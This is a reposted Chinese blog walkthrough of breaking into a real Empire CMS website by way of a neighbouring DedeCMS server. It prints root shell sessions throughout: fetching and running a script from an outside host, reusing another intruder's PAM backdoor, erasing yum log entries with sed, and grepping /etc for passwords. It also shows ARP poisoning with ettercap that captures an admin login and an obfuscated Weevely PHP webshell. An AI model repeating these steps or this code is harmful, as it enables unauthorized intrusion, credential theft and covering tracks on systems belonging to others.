网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

渗透网站的一个过程 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 很久没写过文章,对于网站渗透我也不是很在行。给大家分享分享下吧,拿一个站的过程。个人口才不好,讲究着看吧。目标站是帝国系统,基本上没什么洞,幸运的是默认后台并没有...

 很久没写过文章,对于网站渗透我也不是很在行。

给大家分享分享下吧,拿一个站的过程。
个人口才不好,讲究着看吧。

目标站是帝国系统,基本上没什么洞,幸运的是默认后台并没有改变。1

来进行IP查询,会发现有CDN加速,获取不了真是IP。2

使用dnsenum进行查询得到了真实IP

3

查询了一下,基本上全部都是帝国,只有C的一台机器使用的dedecms,那就从这里下手。3

Dede后台被修改,后台从robots.txt获取到。刚好试下新出炉的dede全版本通杀的漏洞forum

得到账号密码后登录后台直接拿到shell。

forum_008

 

Php函数禁用了,试着用weevely来突破都没有成功,但是并没有对目录进行限制,我还是可以跨越目录的,把sshd和pam文件下载下来进行分析,是否被前辈路过种过什么后门。

forum_005

这是分析pam文件得到的结果。

forum_011

既然有后门那就直接登录系统吧,pam后门里面分析得到了密码记录文件,轻松获取系统密码,挺感谢这个前辈。forum_002  

当然,这种情况下渗透太危险,因为你的IP已经泄漏。

root  pts/1   192.168.0.0         15:32    2:05m  1:40   7.84s -bash
root  pts/3   192.168.0.0         15:54    3:06m  0.34s  7.84s -bash   
 root@glles08:~# wget http://210.34.xxx.xxx/ip.py
--2014-04-16 19:04:48--  http://210.34.xxx.xxx/ip.py

正在连接 110.34.195.194:80... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK长度:3849 (3.8K) [text/x-python]正在保存至: “ip.py” 100%

 
100%[===================================================================================================================================================================================================>] 3,849       --.-K/s   in0s     
 
2014-04-16 19:04:48 (291 MB/s) - 已保存 “ip.py” [3849/3849])
 
root@glles08:~# python ip.py  -u root -f 210.34.xxx.xxx
root@glles08:~# w
 19:05:01 up 1 day,  1:30,  3 users,  load average: 1.03, 1.03, 1.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root                  pts/2    :2.0             Tue22    3:33m  0.01s  0.01s /bin/bash
 
 
已经不见了。
 
 
下面可以放心的渗透了,查看了下history记录,笑了。
  68 cat aaaa.txt
  69 netstat -anpt
  70 history
  71 cat ntpupdatedate.sh
  72 iptables -nvL
  73 tcpdump -i eth0
  74 tcpdump -o eth0
  75 tcpdump --help
  76 tcpdump -i eth0
  77 tcpdump -iv eth0
  78 tcpdump -i -v eth0
  79 tcpdump -v -i eth0
  80 w
  81 last
  82 last | grep ftpuser
  83 cd /var/ftp/pub/
  84 ls
  85 cd ..
  86 ls
  87 cd ..
  88 clear
  89 id ftpuser
  90 cat /etc/passwd
  91 ll
  92 ps -Af
  93 tcpdump
  94 who
  95 who
  96 who
  97 tcpdump
  98 tcpdump -v
  99 iostat
 100 istat
 101 tail -f /var/spool/mail/root
 102 /sbin/ntpdate
 103 cd /
 104 find -name ntpdate
 105 vi root/ntpupdatedate.sh
 106 tcpdump -vv
 107 su - ftpuser
 108 last
 109 ll
 110 vi /etc/passwd
 111 cd /www/upload/ftproot/cms
 112 ll
 228 echo '' access
 229 echo '' access.log
 230 echo '' > access.log
 
 
看来我高估那个前辈了。
 
因为不是内网,没必要翻什么配置文件,C直接就嗅探了。
这里给大家说一下吧,如果在渗透内网的时候要翻记录密码的文件内容的话可以使用这条命令:
grep -r --include=”*.conf” “pass” /etc/                #递归查看所有.conf文件里面包含pass内容的文件。
 
 
root@glles08:~# cd /etc/yum.repos.d/
root@glles08:~#  ls
CentOS-Base.repo  CentOS-Debuginfo.repo  CentOS-Media.repo  CentOS-Vault.repo
root@glles08:~#  uname -a
Linux cloud 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux
root@glles08:~# vi ettercap.repo
[etter]
name=etter
baseurl=http://dl.fedoraproject.org/pub/epel/6/i386/
enabled=1
gpgcheck=0
 
root@glles08:~#yum clean all
yum insLoaded plugins: fastestmirror, refresh-packagekit, security
Cleaning repos: base etter extras updates
Cleaning up Everything
tCleaning up list of fastest mirrors
root@glles08:~#yum install ettercap -y
Loaded plugins: fastestmirror, refresh-packagekit, security
Determining fastest mirrors
 * base: centos.01link.hk
 * extras: centos.01link.hk
 * updates: mirror.sunnyvision.com
base                                                                                                                                                                                                                  | 3.7 kB     00:00    
base/primary_db                                                                                                                                                                                                       | 3.5 MB     00:00    
etter                                                                                                                                                                                                                 | 4.4 kB     00:00    
etter/primary_db                                                                                                                                                                                                      | 5.0 MB     00:07    
extras                                                                                                                                                                                                                | 3.4 kB     00:00    
extras/primary_db                                                                                                                                                                                                     |  18 kB     00:00    
updates                                                                                                                                                                                                               | 3.4 kB     00:00    
updates/primary_db                                                                                                                                                                                                    | 2.4 MB     00:00    
Setting up Install Process
Resolving Dependencies
--> Running transaction check
---> Package ettercap.i686 0:0.7.5-3.el6.1.20120906gitc796e5 will be installed
--> Processing Dependency: libnet.so.1 for package: ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686
--> Running transaction check
---> Package libnet.i686 0:1.1.6-7.el6 will be installed
--> Finished Dependency Resolution
 
Dependencies Resolved
 
=============================================================================================================================================================================================================================================
 Package                                              Arch                                             Version                                                                       Repository                                         Size
=============================================================================================================================================================================================================================================
Installing:
 ettercap                                             i686                                             0.7.5-3.el6.1.20120906gitc796e5                                               etter                                             472 k
Installing for dependencies:
 libnet                                               i686                                             1.1.6-7.el6                                                                   etter                                              59 k
 
Transaction Summary
=============================================================================================================================================================================================================================================
Install       2 Package(s)
 
Total download size: 531 k
Installed size: 1.5 M
Downloading Packages:
(1/2): ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686.rpm                                                                                                                                                              | 472 kB     00:01    
(2/2): libnet-1.1.6-7.el6.i686.rpm                                                                                                                                                                                    |  59 kB     00:00    
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Total                                                                                                                                                                                                        308 kB/s | 531 kB     00:01    
Running rpm_check_debug
Running Transaction Test
Transaction Test Succeeded
Running Transaction
  Installing : libnet-1.1.6-7.el6.i686                                                                                                                                                                                                   1/2
  Installing : ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686                                                                                                                                                                             2/2
  Verifying  : libnet-1.1.6-7.el6.i686                                                                                                                                                                                                   1/2
  Verifying  : ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686                                                                                                                                                                             2/2
 
Installed:
  ettercap.i686 0:0.7.5-3.el6.1.20120906gitc796e5                                                                                                                                                                                           
 
Dependency Installed:
  libnet.i686 0:1.1.6-7.el6                                                                                                                                                                                                                 
 
Complete!
root@glles08:~#
 
 
root@glles08:~#cat /var/log/yum.log
Apr 15 22:04:09 Installed: tigervnc-server-1.1.0-8.el6_5.i686
Apr 15 22:04:11 Installed: tigervnc-1.1.0-8.el6_5.i686
Apr 16 12:03:59 Installed: nc-1.84-22.el6.i686
Apr 16 15:25:36 Updated: xorg-x11-server-common-1.13.0-23.1.el6.centos.i686
Apr 16 15:25:41 Updated: openssl-1.0.1e-16.el6_5.7.i686
Apr 16 15:25:42 Installed: xorg-x11-server-Xvfb-1.13.0-23.1.el6.centos.i686
Apr 16 16:23:02 Installed: 2:nmap-5.51-3.el6.i686
Apr 16 19:13:33 Installed: libnet-1.1.6-7.el6.i686
Apr 16 19:13:37 Installed: ettercap-0.7.5-3.el6.1.20120906gitc796e5.i686
root@glles08:~#sed -i '/19:/d' /var/log/yum.log
root@glles08:~#cat /var/log/yum.log
Apr 15 22:04:09 Installed: tigervnc-server-1.1.0-8.el6_5.i686
Apr 15 22:04:11 Installed: tigervnc-1.1.0-8.el6_5.i686
Apr 16 12:03:59 Installed: nc-1.84-22.el6.i686
Apr 16 15:25:36 Updated: xorg-x11-server-common-1.13.0-23.1.el6.centos.i686
Apr 16 15:25:41 Updated: openssl-1.0.1e-16.el6_5.7.i686
Apr 16 15:25:42 Installed: xorg-x11-server-Xvfb-1.13.0-23.1.el6.centos.i686
Apr 16 16:23:02 Installed: 2:nmap-5.51-3.el6.i686
root@glles08:~#
 
root@glles08:~#ettercap -T -M arp // // -q -i eth0
 
ettercap 0.7.5 copyright 2001-2012 Ettercap Development Team
 
 
Incorrect number of token (///) in TARGET !!
 
root@glles08:~#ettercap -T -M arp /// /// -q -i eth0
 
ettercap 0.7.5 copyright 2001-2012 Ettercap Development Team
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
 
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
 
Randomizing 7 hosts for scanning...
Scanning the whole netmask for 7 hosts...
* |==================================================>| 100.00 %
 
1 hosts added to the hosts list...
 
ARP poisoning victims:
 
 GROUP 1 : ANY (all the hosts in the list)
 
 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
 
 
HTTP : 122.11.xxx.xxx:80 -> USER: admin  PASS: 82413113  INFO: http://xxx.xxx.com/e/admin/index.php






 抓获到密码之后,发现了愚蠢的事,只抓到账号密码忘记设置认证码了。帝国登录后台有账号:密码:认证码:需要到ettercap里面定义。

forum_013

 

root@glles08:~#rpm -ql ettercap
/etc/ettercap
/etc/ettercap/etter.conf
/etc/ettercap/etter.dns
/etc/ettercap/etter.nbns
/usr/bin/ettercap
/usr/bin/etterfilter
/usr/bin/etterlog
/usr/lib/ettercap
/usr/lib/ettercap/ec_arp_cop.so
/usr/lib/ettercap/ec_autoadd.so
/usr/lib/ettercap/ec_chk_poison.so
/usr/lib/ettercap/ec_dns_spoof.so
/usr/lib/ettercap/ec_dos_attack.so
/usr/lib/ettercap/ec_dummy.so
/usr/lib/ettercap/ec_find_conn.so
/usr/lib/ettercap/ec_find_ettercap.so
/usr/lib/ettercap/ec_find_ip.so
/usr/lib/ettercap/ec_finger.so
/usr/lib/ettercap/ec_finger_submit.so
/usr/lib/ettercap/ec_gre_relay.so
/usr/lib/ettercap/ec_gw_discover.so
/usr/lib/ettercap/ec_isolate.so
/usr/lib/ettercap/ec_link_type.so
/usr/lib/ettercap/ec_nbns_spoof.so
/usr/lib/ettercap/ec_pptp_chapms1.so
/usr/lib/ettercap/ec_pptp_clear.so
/usr/lib/ettercap/ec_pptp_pap.so
/usr/lib/ettercap/ec_pptp_reneg.so
/usr/lib/ettercap/ec_rand_flood.so
/usr/lib/ettercap/ec_remote_browser.so
/usr/lib/ettercap/ec_reply_arp.so
/usr/lib/ettercap/ec_repoison_arp.so
/usr/lib/ettercap/ec_scan_poisoner.so
/usr/lib/ettercap/ec_search_promisc.so
/usr/lib/ettercap/ec_smb_clear.so
/usr/lib/ettercap/ec_smb_down.so
/usr/lib/ettercap/ec_smurf_attack.so
/usr/lib/ettercap/ec_sslstrip.so
/usr/lib/ettercap/ec_stp_mangler.so
/usr/share/applications/fedora-ettercap.desktop
/usr/share/doc/ettercap-0.7.5
/usr/share/doc/ettercap-0.7.5/AUTHORS
/usr/share/doc/ettercap-0.7.5/CHANGELOG
/usr/share/doc/ettercap-0.7.5/LICENSE
/usr/share/doc/ettercap-0.7.5/README
/usr/share/doc/ettercap-0.7.5/THANKS
/usr/share/doc/ettercap-0.7.5/TODO
/usr/share/doc/ettercap-0.7.5/TODO.TESTING
/usr/share/doc/ettercap-0.7.5/doc
/usr/share/doc/ettercap-0.7.5/doc/capture
/usr/share/doc/ettercap-0.7.5/doc/decoders
/usr/share/doc/ettercap-0.7.5/doc/dissectors
/usr/share/doc/ettercap-0.7.5/doc/plugins
/usr/share/doc/ettercap-0.7.5/doc/threads
/usr/share/doc/ettercap-README.fedora
/usr/share/doc/ettercap_easter_egg_license.txt
/usr/share/ettercap
/usr/share/ettercap/etter.fields
/usr/share/ettercap/etter.filter
/usr/share/ettercap/etter.filter.examples
/usr/share/ettercap/etter.filter.kill
/usr/share/ettercap/etter.filter.pcre
/usr/share/ettercap/etter.filter.ssh
/usr/share/ettercap/etter.finger.mac
/usr/share/ettercap/etter.finger.os
/usr/share/ettercap/etter.mime
/usr/share/ettercap/etter.services
/usr/share/ettercap/etter.ssl.crt
/usr/share/ettercap/ettercap.png
/usr/share/ettercap/etterfilter.cnt
/usr/share/ettercap/etterfilter.tbl
/usr/share/ettercap/etterlog.dtd
/usr/share/icons/hicolor/32x32/apps/ettercap.png
/usr/share/man/man5/etter.conf.5.gz
/usr/share/man/man8/ettercap.8.gz
/usr/share/man/man8/ettercap_curses.8.gz
/usr/share/man/man8/ettercap_plugins.8.gz
/usr/share/man/man8/etterfilter.8.gz
/usr/share/man/man8/etterlog.8.gz
 
root@glles08:~#cd /usr/share/ettercap/
[root@cloud ettercap]# ls
ettercap.png  etter.filter     etter.filter.examples  etter.filter.pcre  etterfilter.tbl   etter.finger.os  etter.mime      etter.ssl.crt
etter.fields  etterfilter.cnt  etter.filter.kill      etter.filter.ssh   etter.finger.mac  etterlog.dtd     etter.services
[root@cloud ettercap]# vi etter.fields
 
############################################################################
#                                                                          #
#  ettercap -- etter.felds -- known HTTP form fields                       #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
#  Version         : $Revision: 1.6 $                                      #
############################################################################
#                                                                          #
#  This file contains the form fields recognized as user or password by    #
#  the HTTP dissector. You can add your own fields in the right section    #
#                                                                          #
############################################################################
 
 
 
[USER]
 
login
unickname
user
email
username
userid
form_loginname
loginname
pop_login
uid
id
user_id
screenname
uname
ulogin
acctname
account
member
mailaddress
membername
login_username
login_email
uin
sign-in
 
 
 
[PASS]
 
pass
password
passwd
form_pw
pw
userpassword
pwd
upassword
login_password
passwort
passwrd
upasswd
 
[loginauth]
 
Loginauth
 
 
 
再次嗅探。
 
root@glles08:~#ettercap -T -M arp // // -q -i eth0
 
ettercap 0.7.5 copyright 2001-2012 Ettercap Development Team
 
 
Incorrect number of token (///) in TARGET !!
 
root@glles08:~#ettercap -T -M arp /// /// -q -i eth0
 
ettercap 0.7.5 copyright 2001-2012 Ettercap Development Team
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
 
  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
 
Randomizing 7 hosts for scanning...
Scanning the whole netmask for 7 hosts...
* |==================================================>| 100.00 %
 
1 hosts added to the hosts list...
 
ARP poisoning victims:
 
 GROUP 1 : ANY (all the hosts in the list)
 
 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
 
 
HTTP : 122.11.xxx.xxx:80 -> USER: admin  PASS: 82413113 loginauth: admin81818 INFO: http://xxx.xxx.com/e/admin/index.php




成功进入后台。forum_004forum_003

其实遇到了狗,那部分没截图,试着绕过安全狗

forum_009  

 

root@software:/usr/share/weevely# cat test.php
<?php
$yedq=”JGM9J2NvdfW50JzskYT0fkX0NPT0tJRTftfpZihyZXfNldCgfkYSk9PSdoZScgJiYgJGMoJGEpP”;
$aokr=”ZXBfsYfWNlKGFycfmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKfycpLCBqbf2luKGF”;
$mnuq = str_replace(“h”,”",”hsthr_rhehphlhahce”);
$igxs=”jMpeyRrPSdsZWf5tafmonO2VjfaG8gJzwnLifRrLic+JztldmFsKGJhfc2U2NF9kZWNvZGUfocHJlZ19y”;
$aqub=”ycmF5X3fNsfaWNlKCRhfLfCRjfKCRhKS0fzKSkpKSk7ZWNobyAnfPC8nLiRrLicf+fJfzt9″;
$ursh = $mnuq(“h”, “”, “hbahseh6h4h_hdecohdhe”);
$urfu = $mnuq(“x”,”",”crexaxtxex_xfxunxcxtxixoxn”);
$nvfj = $urfu(”, $ursh($mnuq(“f”, “”, $yedq.$igxs.$aokr.$aqub))); $nvfj();
?>root@software:/usr/share/weevely# weevely http://xxx.xxx.com/2.php helenmjj
      ________                      __
     |  |  |  |—–.—-.-.–.—-’  |–.–.
     |  |  |  |  -__| -__| |  | -__|  |  |  |
     |________|_____|____|___/|____|__|___  | v1.0
                                      |_____|
              Stealth tiny web shell
[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ‘:help’ to list available modules and run selected one.
[shell.php] No response with Cookie method
[shell.php] No response with Referer method
[!] [shell.php] PHP and Shell interpreters load failed
root@software:/usr/share/weevely#
还是没过。。。forum_004 


然后本地搭建web环境来连接

forum_006

至此结束!

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论